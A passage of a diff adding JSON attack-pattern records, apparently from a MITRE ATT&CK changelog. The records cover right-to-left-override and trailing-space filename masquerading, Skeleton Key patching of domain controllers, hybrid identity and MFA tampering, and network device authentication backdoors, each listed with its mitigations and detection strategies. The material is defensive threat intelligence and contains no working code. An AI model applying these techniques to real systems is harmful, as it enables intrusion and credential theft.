+                    "description": "Adversaries may abuse the right-to-left override (RTLO or RLO) character (U+202E) to disguise a string and/or file name to make it appear benign. RTLO is a non-printing Unicode character that causes the text that follows it to be displayed in reverse. For example, a Windows screensaver executable named <code>March 25 \\u202Excod.scr</code> will display as <code>March 25 rcs.docx</code>. A JavaScript file named <code>photo_high_re\\u202Egnp.js</code> will be displayed as <code>photo_high_resj.png</code>.(Citation: Infosecinstitute RTLO Technique)\n\nAdversaries may abuse the RTLO character as a means of tricking a user into executing what they think is a benign file type. A common use of this technique is with [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001)/[Malicious File](https://attack.mitre.org/techniques/T1204/002) since it can trick both end users and defenders if they are not aware of how their tools display and render the RTLO character. Use of the RTLO character has been seen in many targeted intrusion attempts and criminal activity.(Citation: Trend Micro PLEAD RTLO)(Citation: Kaspersky RTLO Cyber Crime) RTLO can be used in the Windows Registry as well, where regedit.exe displays the reversed characters but the command line tool reg.exe does not by default.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1036/002",
+                            "external_id": "T1036.002"
+                        },
+                        {
+                            "source_name": "Trend Micro PLEAD RTLO",
+                            "description": "Alintanahin, K.. (2014, May 23). PLEAD Targeted Attacks Against Taiwanese Government Agencies. Retrieved April 22, 2019.",
+                            "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/plead-targeted-attacks-against-taiwanese-government-agencies-2/"
+                        },
+                        {
+                            "source_name": "Kaspersky RTLO Cyber Crime",
+                            "description": "Firsh, A.. (2018, February 13). Zero-day vulnerability in Telegram - Cybercriminals exploited Telegram flaw to launch multipurpose attacks. Retrieved April 22, 2019.",
+                            "url": "https://securelist.com/zero-day-vulnerability-in-telegram/83800/"
+                        },
+                        {
+                            "source_name": "Infosecinstitute RTLO Technique",
+                            "description": "Security Ninja. (2015, April 16). Spoof Using Right to Left Override (RTLO) Technique. Retrieved April 22, 2019.",
+                            "url": "https://web.archive.org/web/20151102094333/https://resources.infosecinstitute.com/spoof-using-right-to-left-override-rtlo-technique-2/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.643000+00:00\", \"old_value\": \"2026-04-15 20:41:03.753000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0527: Right-to-Left Override Masquerading Detection via Filename and Execution Context"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--e51137a5-1cdc-499e-911a-abaedaa5ac86",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-02-10 20:47:10.082000+00:00",
+                    "modified": "2026-05-12 15:12:00.723000+00:00",
+                    "name": "Space after Filename",
+                    "description": "Adversaries can hide a program's true filetype by changing the extension of a file. With certain file types (specifically this does not work with .app extensions), appending a space to the end of a filename will change how the file is processed by the operating system.\n\nFor example, if there is a Mach-O executable file called <code>evil.bin</code>, when it is double clicked by a user, it will launch Terminal.app and execute. If this file is renamed to <code>evil.txt</code>, then when double clicked by a user, it will launch with the default text editing application (not executing the binary). However, if the file is renamed to <code>evil.txt </code> (note the space at the end), then when double clicked by a user, the true file type is determined by the OS and handled appropriately and the binary will be executed (Citation: Mac Backdoors are back).\n\nAdversaries can use this feature to trick users into double clicking benign-looking files of any format and ultimately executing something malicious.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1036/006",
+                            "external_id": "T1036.006"
+                        },
+                        {
+                            "source_name": "Mac Backdoors are back",
+                            "description": "Dan Goodin. (2016, July 6). After hiatus, in-the-wild Mac backdoors are suddenly back. Retrieved July 8, 2017.",
+                            "url": "https://arstechnica.com/security/2016/07/after-hiatus-in-the-wild-mac-backdoors-are-suddenly-back/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Erye Hernandez, Palo Alto Networks"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "macOS"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.723000+00:00\", \"old_value\": \"2026-04-15 20:41:09.462000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0292: Masquerading via Space After Filename - Behavioral Detection Strategy"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--f4c1826f-a322-41cd-9557-562100848c84",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-02-11 19:01:56.887000+00:00",
+                    "modified": "2026-05-12 15:12:00.724000+00:00",
+                    "name": "Modify Authentication Process",
+                    "description": "Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on MacOS systems, responsible for gathering, storing, and validating credentials. By modifying an authentication process, an adversary may be able to authenticate to a service or system without using [Valid Accounts](https://attack.mitre.org/techniques/T1078).\n\nAdversaries may maliciously modify a part of this process to either reveal credentials or bypass authentication mechanisms. Compromised credentials or access may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "defense-impairment"
+                        },
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "persistence"
+                        },
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "credential-access"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1556",
+                            "external_id": "T1556"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Chris Ross @xorrior"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "IaaS",
+                        "Identity Provider",
+                        "Linux",
+                        "macOS",
+                        "Network Devices",
+                        "Office Suite",
+                        "SaaS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "3.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.724000+00:00\", \"old_value\": \"2026-04-16 20:07:52.977000+00:00\"}}}",
+                    "previous_version": "3.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1018: User Account Management",
+                            "M1022: Restrict File and Directory Permissions",
+                            "M1024: Restrict Registry Permissions",
+                            "M1025: Privileged Process Integrity",
+                            "M1026: Privileged Account Management",
+                            "M1027: Password Policies",
+                            "M1028: Operating System Configuration",
+                            "M1032: Multi-factor Authentication",
+                            "M1047: Audit"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0104: Detect Modification of Authentication Processes Across Platforms"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--ceaeb6d8-95ee-4da2-9d42-dc6aa6ca43ae",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2024-01-02 13:43:37.389000+00:00",
+                    "modified": "2026-05-12 15:12:00.717000+00:00",
+                    "name": "Conditional Access Policies",
+                    "description": "Adversaries may disable or modify conditional access policies to enable persistent access to compromised accounts. Conditional access policies are additional verifications used by identity providers and identity and access management systems to determine whether a user should be granted access to a resource.\n\nFor example, in Entra ID, Okta, and JumpCloud, users can be denied access to applications based on their IP address, device enrollment status, and use of multi-factor authentication.(Citation: Microsoft Conditional Access)(Citation: JumpCloud Conditional Access Policies)(Citation: Okta Conditional Access Policies) In some cases, identity providers may also support the use of risk-based metrics to deny sign-ins based on a variety of indicators. In AWS and GCP, IAM policies can contain `condition` attributes that verify arbitrary constraints such as the source IP, the date the request was made, and the nature of the resources or regions being requested.(Citation: AWS IAM Conditions)(Citation: GCP IAM Conditions) These measures help to prevent compromised credentials from resulting in unauthorized access to data or resources, as well as limit user permissions to only those required. \n\nBy modifying conditional access policies, such as adding additional trusted IP ranges, removing [Multi-Factor Authentication](https://attack.mitre.org/techniques/T1556/006) requirements, or allowing additional [Unused/Unsupported Cloud Regions](https://attack.mitre.org/techniques/T1535), adversaries may be able to ensure persistent access to accounts and circumvent defensive measures.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "defense-impairment"
+                        },
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "persistence"
+                        },
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "credential-access"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1556/009",
+                            "external_id": "T1556.009"
+                        },
+                        {
+                            "source_name": "AWS IAM Conditions",
+                            "description": "AWS. (n.d.). IAM JSON policy elements: Condition. Retrieved January 2, 2024.",
+                            "url": "https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_policies_elements_condition.html"
+                        },
+                        {
+                            "source_name": "GCP IAM Conditions",
+                            "description": "Google Cloud. (n.d.). Overview of IAM Conditions. Retrieved January 2, 2024.",
+                            "url": "https://cloud.google.com/iam/docs/conditions-overview"
+                        },
+                        {
+                            "source_name": "JumpCloud Conditional Access Policies",
+                            "description": "JumpCloud. (n.d.). Get Started: Conditional Access Policies. Retrieved January 2, 2024.",
+                            "url": "https://jumpcloud.com/support/get-started-conditional-access-policies"
+                        },
+                        {
+                            "source_name": "Microsoft Conditional Access",
+                            "description": "Microsoft. (2023, November 15). What is Conditional Access?. Retrieved January 2, 2024.",
+                            "url": "https://learn.microsoft.com/en-us/entra/identity/conditional-access/overview"
+                        },
+                        {
+                            "source_name": "Okta Conditional Access Policies",
+                            "description": "Okta. (2023, November 30). Conditional Access Based on Device Security Posture. Retrieved January 2, 2024.",
+                            "url": "https://support.okta.com/help/s/article/Conditional-access-based-on-device-security-posture?language=en_US"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Gavin Knapp",
+                        "Joshua Penny"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "IaaS",
+                        "Identity Provider"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.717000+00:00\", \"old_value\": \"2026-04-16 20:07:53.111000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1018: User Account Management"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0030: Detect Conditional Access Policy Modification in Identity and Cloud Platforms"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-02-11 19:05:02.399000+00:00",
+                    "modified": "2026-05-12 15:12:00.717000+00:00",
+                    "name": "Domain Controller Authentication",
+                    "description": "Adversaries may patch the authentication process on a domain controller to bypass the typical authentication mechanisms and enable access to accounts. \n\nMalware may be used to inject false credentials into the authentication process on a domain controller with the intent of creating a backdoor used to access any user\u2019s account and/or credentials (ex: [Skeleton Key](https://attack.mitre.org/software/S0007)). Skeleton key works through a patch on an enterprise domain controller authentication process (LSASS) with credentials that adversaries may use to bypass the standard authentication system. Once patched, an adversary can use the injected password to successfully authenticate as any domain user account (until the the skeleton key is erased from memory by a reboot of the domain controller). Authenticated access may enable unfettered access to hosts and/or resources within single-factor authentication environments.(Citation: Dell Skeleton)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "defense-impairment"
+                        },
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "persistence"
+                        },
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "credential-access"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1556/001",
+                            "external_id": "T1556.001"
+                        },
+                        {
+                            "source_name": "Dell Skeleton",
+                            "description": "Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis. Retrieved April 8, 2019.",
+                            "url": "https://www.secureworks.com/research/skeleton-key-malware-analysis"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_version": "3.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.717000+00:00\", \"old_value\": \"2026-04-16 20:07:53.091000+00:00\"}}}",
+                    "previous_version": "3.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1017: User Training",
+                            "M1025: Privileged Process Integrity",
+                            "M1026: Privileged Account Management",
+                            "M1032: Multi-factor Authentication"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0271: Detect Domain Controller Authentication Process Modification (Skeleton Key)"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--54ca26f3-c172-4231-93e5-ccebcac2161f",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2022-09-28 13:29:53.354000+00:00",
+                    "modified": "2026-05-12 15:12:00.633000+00:00",
+                    "name": "Hybrid Identity",
+                    "description": "Adversaries may patch, modify, or otherwise backdoor cloud authentication processes that are tied to on-premises user identities in order to bypass typical authentication mechanisms, access credentials, and enable persistent access to accounts.  \n\nMany organizations maintain hybrid user and device identities that are shared between on-premises and cloud-based environments. These can be maintained in a number of ways. For example, Microsoft Entra ID includes three options for synchronizing identities between Active Directory and Entra ID(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization (PHS), in which a privileged on-premises account synchronizes user password hashes between Active Directory and Entra ID, allowing authentication to Entra ID to take place entirely in the cloud \n* Pass Through Authentication (PTA), in which Entra ID authentication attempts are forwarded to an on-premises PTA agent, which validates the credentials against Active Directory \n* Active Directory Federation Services (AD FS), in which a trust relationship is established between Active Directory and Entra ID \n\nAD FS can also be used with other SaaS and cloud platforms such as AWS and GCP, which will hand off the authentication process to AD FS and receive a token containing the hybrid users\u2019 identity and privileges. \n\nBy modifying authentication processes tied to hybrid identities, an adversary may be able to establish persistent privileged access to cloud resources. For example, adversaries who compromise an on-premises server running a PTA agent may inject a malicious DLL into the `AzureADConnectAuthenticationAgentService` process that authorizes all attempts to authenticate to Entra ID, as well as records user credentials.(Citation: Azure AD Connect for Read Teamers)(Citation: AADInternals Azure AD On-Prem to Cloud) In environments using AD FS, an adversary may edit the `Microsoft.IdentityServer.Servicehost` configuration file to load a malicious DLL that generates authentication tokens for any user with any set of claims, thereby bypassing multi-factor authentication and defined AD FS policies.(Citation: MagicWeb)\n\nIn some cases, adversaries may be able to modify the hybrid identity authentication process from the cloud. For example, adversaries who compromise a Global Administrator account in an Entra ID tenant may be able to register a new PTA agent via the web console, similarly allowing them to harvest credentials and log into the Entra ID environment as any user.(Citation: Mandiant Azure AD Backdoors)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "defense-impairment"
+                        },
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "persistence"
+                        },
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "credential-access"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1556/007",
+                            "external_id": "T1556.007"
+                        },
+                        {
+                            "source_name": "Azure AD Connect for Read Teamers",
+                            "description": "Adam Chester. (2019, February 18). Azure AD Connect for Red Teamers. Retrieved September 28, 2022.",
+                            "url": "https://blog.xpnsec.com/azuread-connect-for-redteam/"
+                        },
+                        {
+                            "source_name": "AADInternals Azure AD On-Prem to Cloud",
+                            "description": "Dr. Nestori Syynimaa. (2020, July 13). Unnoticed sidekick: Getting access to cloud as an on-prem admin. Retrieved September 28, 2022.",
+                            "url": "https://o365blog.com/post/on-prem_admin/"
+                        },
+                        {
+                            "source_name": "MagicWeb",
+                            "description": "Microsoft Threat Intelligence Center, Microsoft Detection and Response Team, Microsoft 365 Defender Research Team . (2022, August 24). MagicWeb: NOBELIUM\u2019s post-compromise trick to authenticate as anyone. Retrieved September 28, 2022.",
+                            "url": "https://www.microsoft.com/security/blog/2022/08/24/magicweb-nobeliums-post-compromise-trick-to-authenticate-as-anyone/"
+                        },
+                        {
+                            "source_name": "Azure AD Hybrid Identity",
+                            "description": "Microsoft. (2022, August 26). Choose the right authentication method for your Azure Active Directory hybrid identity solution. Retrieved September 28, 2022.",
+                            "url": "https://learn.microsoft.com/en-us/azure/active-directory/hybrid/choose-ad-authn"
+                        },
+                        {
+                            "source_name": "Mandiant Azure AD Backdoors",
+                            "description": "Mike Burns. (2020, September 30). Detecting Microsoft 365 and Azure Active Directory Backdoors. Retrieved September 28, 2022.",
+                            "url": "https://www.mandiant.com/resources/detecting-microsoft-365-azure-active-directory-backdoors"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Praetorian"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "IaaS",
+                        "Identity Provider",
+                        "Office Suite",
+                        "SaaS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.633000+00:00\", \"old_value\": \"2026-04-16 20:07:52.922000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1026: Privileged Account Management",
+                            "M1032: Multi-factor Authentication",
+                            "M1047: Audit"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0293: Detect Hybrid Identity Authentication Process Modification"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--b4409cd8-0da9-46e1-a401-a241afd4d1cc",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2022-05-31 19:31:38.431000+00:00",
+                    "modified": "2026-05-12 15:12:00.708000+00:00",
+                    "name": "Multi-Factor Authentication",
+                    "description": "Adversaries may disable or modify multi-factor authentication (MFA) mechanisms to enable persistent access to compromised accounts.\n\nOnce adversaries have gained access to a network by either compromising an account lacking MFA or by employing an MFA bypass method such as [Multi-Factor Authentication Request Generation](https://attack.mitre.org/techniques/T1621), adversaries may leverage their access to modify or completely disable MFA defenses. This can be accomplished by abusing legitimate features, such as excluding users from Azure AD Conditional Access Policies, registering a new yet vulnerable/adversary-controlled MFA method, or by manually patching MFA programs and configuration files to bypass expected functionality.(Citation: Mandiant APT42)(Citation: Azure AD Conditional Access Exclusions)\n\nFor example, modifying the Windows hosts file (`C:\\windows\\system32\\drivers\\etc\\hosts`) to redirect MFA calls to localhost instead of an MFA server may cause the MFA process to fail. If a \"fail open\" policy is in place, any otherwise successful authentication attempt may be granted access without enforcing MFA. (Citation: Russians Exploit Default MFA Protocol - CISA March 2022) \n\nDepending on the scope, goals, and privileges of the adversary, MFA defenses may be disabled for individual accounts or for all accounts tied to a larger group, such as all domain accounts in a victim's network environment.(Citation: Russians Exploit Default MFA Protocol - CISA March 2022) ",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "defense-impairment"
+                        },
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "persistence"
+                        },
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "credential-access"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1556/006",
+                            "external_id": "T1556.006"
+                        },
+                        {
+                            "source_name": "Russians Exploit Default MFA Protocol - CISA March 2022",
+                            "description": "Cyber Security Infrastructure Agency. (2022, March 15). Russian State-Sponsored Cyber Actors Gain Network Access by Exploiting Default Multifactor Authentication Protocols and \u201cPrintNightmare\u201d Vulnerability. Retrieved May 31, 2022.",
+                            "url": "https://www.cisa.gov/uscert/ncas/alerts/aa22-074a"
+                        },
+                        {
+                            "source_name": "Mandiant APT42",
+                            "description": "Mandiant. (n.d.). APT42: Crooked Charms, Cons and Compromise. Retrieved September 16, 2022.",
+                            "url": "https://www.mandiant.com/media/17826"
+                        },
+                        {
+                            "source_name": "Azure AD Conditional Access Exclusions",
+                            "description": "Microsoft. (2022, August 26). Use Azure AD access reviews to manage users excluded from Conditional Access policies. Retrieved August 30, 2022.",
+                            "url": "https://docs.microsoft.com/en-us/azure/active-directory/governance/conditional-access-exclusion"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Arun Seelagan, CISA",
+                        "Liran Ravich, CardinalOps",
+                        "Muhammad Moiz Arshad, @5T34L7H"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "IaaS",
+                        "Identity Provider",
+                        "Linux",
+                        "macOS",
+                        "Office Suite",
+                        "SaaS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.708000+00:00\", \"old_value\": \"2026-04-16 20:07:52.875000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1018: User Account Management",
+                            "M1032: Multi-factor Authentication",
+                            "M1047: Audit"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0190: Detect MFA Modification or Disabling Across Platforms"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--fa44a152-ac48-441e-a524-dd7b04b8adcd",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-10-19 17:58:04.155000+00:00",
+                    "modified": "2026-05-12 15:12:00.726000+00:00",
+                    "name": "Network Device Authentication",
+                    "description": "Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices.\n\n[Modify System Image](https://attack.mitre.org/techniques/T1601) may include implanted code to the operating system for network devices to provide access for adversaries using a specific password.  The modification includes a specific password which is implanted in the operating system image via the patch.  Upon authentication attempts, the inserted code will first check to see if the user input is the password. If so, access is granted. Otherwise, the implanted code will pass the credentials on for verification of potentially valid credentials.(Citation: Mandiant - Synful Knock)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "defense-impairment"
+                        },
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "persistence"
+                        },
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "credential-access"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1556/004",
+                            "external_id": "T1556.004"
+                        },
+                        {
+                            "source_name": "Mandiant - Synful Knock",
+                            "description": "Bill Hau, Tony Lee, Josh Homan. (2015, September 15). SYNful Knock - A Cisco router implant - Part I. Retrieved November 17, 2024.",
+                            "url": "https://cloud.google.com/blog/topics/threat-intelligence/synful-knock-acis/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Network Devices"
+                    ],
+                    "x_mitre_version": "3.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.726000+00:00\", \"old_value\": \"2026-04-16 20:07:53.117000+00:00\"}}}",
+                    "previous_version": "3.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1026: Privileged Account Management",
+                            "M1032: Multi-factor Authentication"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0272: Detect Modification of Network Device Authentication via Patched System Images"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
